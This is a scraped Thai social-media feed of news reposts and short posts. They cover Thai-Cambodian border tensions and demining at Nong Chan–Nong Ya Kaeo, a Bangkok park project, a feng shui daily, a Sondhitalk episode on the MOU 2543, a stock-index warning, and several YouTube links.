    เริ่มตึงเครียด ชายแดนบ้านหนองจาน -​หนอง​หญ้า​แก้ว​ อ.โคกสูง จ.สระแก้ว ฝ่ายเขมรเสริมมวลชน-กำลังทหารกว่าเท่าตัว คาดหลังเที่ยงมาอีกเพียบ ขณะฝั่งไทยยังเฝ้าดูสถานการณ์​ใกล้ชิด เตือนชาวบ้านอย่าเข้าพื้นที่เสี่ยง อ่านต่อ..https://news1live.com/detail/9680000096932 #News1live #News1 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire #เขมรลักลอบวางระเบิด
    0 ความคิดเห็น 0 การแบ่งปัน 55 มุมมอง 0 รีวิว
  • กองพลทหารราบที่ 51 กัมพูชา ส่งหนังสือตอบกลับกองกำลังบูรพาขอให้หยุดเก็บกู้ทุ่นระเบิดบ้านหนองจาน-หนองหญ้าแก้ว ที่จะเริ่มวันนี้ อ้างไม่เป็นไปตามข้อตกลง GBC เมื่อวันที่ 10 ก.ย. ที่ต้องกำหนดขั้นตอนการปฏิบัติงานก่อน และรอการตัดสินใจจากผู้บังคับบัญชา

    อ่านต่อ..https://news1live.com/detail/9680000096933

    #News1live #News1 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire #เขมรลักลอบวางระเบิด
    กองพลทหารราบที่ 51 กัมพูชา ส่งหนังสือตอบกลับกองกำลังบูรพาขอให้หยุดเก็บกู้ทุ่นระเบิดบ้านหนองจาน-หนองหญ้าแก้ว ที่จะเริ่มวันนี้ อ้างไม่เป็นไปตามข้อตกลง GBC เมื่อวันที่ 10 ก.ย. ที่ต้องกำหนดขั้นตอนการปฏิบัติงานก่อน และรอการตัดสินใจจากผู้บังคับบัญชา อ่านต่อ..https://news1live.com/detail/9680000096933 #News1live #News1 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire #เขมรลักลอบวางระเบิด
    0 ความคิดเห็น 0 การแบ่งปัน 60 มุมมอง 0 รีวิว
  • 10.10 เกาะติดสถานการณ์
    หนองหญ้าแก้ว - หนองจาน
    เริ่มแล้ว (09.30 น.) ฝั่งกัมพูชา เริ่มรวมมวลชนและผู้สื่อข่าวเข้ามาในพื้นที่ ประมาณ 100 คน
    10.10 เกาะติดสถานการณ์ หนองหญ้าแก้ว - หนองจาน เริ่มแล้ว (09.30 น.) ฝั่งกัมพูชา เริ่มรวมมวลชนและผู้สื่อข่าวเข้ามาในพื้นที่ ประมาณ 100 คน
    0 ความคิดเห็น 0 การแบ่งปัน 4 มุมมอง 0 รีวิว
  • พวกนักสังเกตการณ์เชื่อว่าสหรัฐฯมีเป้าหมายกีดกันจีน ให้อยู่วงนอกการประชุมอาเซียน ที่กำลังมาถึงในเดือนตุลาคม โดยใช้อิทธิพลในข้อตกลงสันติภาพระหว่างกัมพูชาและไทยเป็นตัวผลักดัน ตามรายงานของแคมโบเดียเดลี

    อ่านต่อ..https://news1live.com/detail/9680000096909

    #News1live #News1 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire #เขมรลักลอบวางระเบิด
    พวกนักสังเกตการณ์เชื่อว่าสหรัฐฯมีเป้าหมายกีดกันจีน ให้อยู่วงนอกการประชุมอาเซียน ที่กำลังมาถึงในเดือนตุลาคม โดยใช้อิทธิพลในข้อตกลงสันติภาพระหว่างกัมพูชาและไทยเป็นตัวผลักดัน ตามรายงานของแคมโบเดียเดลี อ่านต่อ..https://news1live.com/detail/9680000096909 #News1live #News1 #Sondhitalk #SondhiX #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire #เขมรลักลอบวางระเบิด
    0 ความคิดเห็น 0 การแบ่งปัน 63 มุมมอง 0 รีวิว
  • 'พรพรหม' สุดภูมิใจเผยภาพ Before-After 3 ปีผ่านมา จากกองขยะอ่อนนุช สู่ สวนป่า 60,000 ต้น กลายเป็นปอดใหญ่แห่งใหม่ของกรุงเทพฯ
    https://www.thai-tai.tv/news/21835/
    .
    #ไทยไท #สวนป่าอ่อนนุช #พื้นที่สีเขียว #ปอดกรุงเทพ #พลิกโฉม #สิ่งแวดล้อม
    'พรพรหม' สุดภูมิใจเผยภาพ Before-After 3 ปีผ่านมา จากกองขยะอ่อนนุช สู่ สวนป่า 60,000 ต้น กลายเป็นปอดใหญ่แห่งใหม่ของกรุงเทพฯ https://www.thai-tai.tv/news/21835/ . #ไทยไท #สวนป่าอ่อนนุช #พื้นที่สีเขียว #ปอดกรุงเทพ #พลิกโฉม #สิ่งแวดล้อม
    0 ความคิดเห็น 0 การแบ่งปัน 3 มุมมอง 0 รีวิว
  • FENGSHUI DAILY
    อัพเดตทุกวัน ที่นี่ที่เดียว
    สีเสริมดวง เสริมความเฮง
    ทิศมงคล เวลามงคล
    อย่าลืมดูกัน เมื่อเริ่มวันใหม่
    วันเสาร์ที่ 11 เดือนตุลาคม พ.ศ.2568
    ___________________________________
    FengshuiBizDesigner
    ฮวงจุ้ย...ออกแบบได้
    FENGSHUI DAILY อัพเดตทุกวัน ที่นี่ที่เดียว สีเสริมดวง เสริมความเฮง ทิศมงคล เวลามงคล อย่าลืมดูกัน เมื่อเริ่มวันใหม่ วันเสาร์ที่ 11 เดือนตุลาคม พ.ศ.2568 ___________________________________ FengshuiBizDesigner ฮวงจุ้ย...ออกแบบได้
    0 ความคิดเห็น 0 การแบ่งปัน 3 มุมมอง 0 รีวิว
  • “รองนายกฯ สุชาติ” ตรวจเยี่ยมให้กำลังใจกำลังพล ป่าไม้ อุทยานฯ จ.เชียงราย ขอบคุณที่เสียสละช่วยดูแลประชาชนในพื้นที่
    https://www.thai-tai.tv/news/21834/
    .
    #ไทยไท #สุชาติชมกลิ่น #เจ้าหน้าที่พิทักษ์ป่า #กรมป่าไม้ #กรมอุทยาน #สวัสดิการ #เชียงราย
    “รองนายกฯ สุชาติ” ตรวจเยี่ยมให้กำลังใจกำลังพล ป่าไม้ อุทยานฯ จ.เชียงราย ขอบคุณที่เสียสละช่วยดูแลประชาชนในพื้นที่ https://www.thai-tai.tv/news/21834/ . #ไทยไท #สุชาติชมกลิ่น #เจ้าหน้าที่พิทักษ์ป่า #กรมป่าไม้ #กรมอุทยาน #สวัสดิการ #เชียงราย
    0 ความคิดเห็น 0 การแบ่งปัน 3 มุมมอง 0 รีวิว
  • SONDHITALK : ผู้เฒ่าเล่าเรื่อง Ep314 (live)

    ยกเลิก MOU43-44 ใครได้ใครเสียประโยชน์ ชำแหละพวกโลกสวย อวยกัมพูชา ทำให้ประชาชนเกิดความสับสนว่าจริงๆ ควรยกเลิก MOU 2543 หรือไม่

    https://www.youtube.com/watch?v=x-vfOqIw-co

    สมัครสมาชิก membership ความจริงมีหนึ่งเดียว ช่อง SONDHITALK บน YouTube
    • ติดต่อสอบถามได้ที่ Line : @sondhitalk
    🔴 SONDHITALK : ผู้เฒ่าเล่าเรื่อง Ep314 (live) • ยกเลิก MOU43-44 ใครได้ใครเสียประโยชน์ ชำแหละพวกโลกสวย อวยกัมพูชา ทำให้ประชาชนเกิดความสับสนว่าจริงๆ ควรยกเลิก MOU 2543 หรือไม่ • https://www.youtube.com/watch?v=x-vfOqIw-co • สมัครสมาชิก membership ความจริงมีหนึ่งเดียว ช่อง SONDHITALK บน YouTube • ติดต่อสอบถามได้ที่ Line : @sondhitalk
    Like
    Love
    11
    8 ความคิดเห็น 0 การแบ่งปัน 134 มุมมอง 0 รีวิว
  • เตือนดัชนี SET หลังจากทำไฮส์ไปที่ 1313.xx

    เราควร monitor Delta ไปด้วย แม้จะไมได้เล่นมัน

    ตรวจสอบให้ดีก่อนเข้าซื้อหุ้นพลังงานที่ราคาสูๆ หลายตัว


    BY.
    เตือนดัชนี SET หลังจากทำไฮส์ไปที่ 1313.xx เราควร monitor Delta ไปด้วย แม้จะไมได้เล่นมัน ตรวจสอบให้ดีก่อนเข้าซื้อหุ้นพลังงานที่ราคาสูๆ หลายตัว BY.
    0 ความคิดเห็น 0 การแบ่งปัน 15 มุมมอง 0 0 รีวิว
  • https://youtu.be/MOTnM_bXhA4?si=m1dEXk8UT_OvOMpD
    https://youtu.be/MOTnM_bXhA4?si=m1dEXk8UT_OvOMpD
    0 ความคิดเห็น 0 การแบ่งปัน 7 มุมมอง 0 รีวิว
  • https://youtube.com/shorts/swPs7X2O1X8?si=jmaSDHnj93ra6Qp2
    https://youtube.com/shorts/swPs7X2O1X8?si=jmaSDHnj93ra6Qp2
    0 ความคิดเห็น 0 การแบ่งปัน 15 มุมมอง 0 รีวิว
  • https://youtube.com/shorts/Sm18qj96uFc?si=j8tzIeWH9kkslzV8
    https://youtube.com/shorts/Sm18qj96uFc?si=j8tzIeWH9kkslzV8
    0 ความคิดเห็น 0 การแบ่งปัน 13 มุมมอง 0 รีวิว
  • https://youtube.com/shorts/liQaBm2zBRk?si=9ehUBkMYTPu1s8nJ
    https://youtube.com/shorts/liQaBm2zBRk?si=9ehUBkMYTPu1s8nJ
    0 ความคิดเห็น 0 การแบ่งปัน 12 มุมมอง 0 รีวิว
Pages Boosts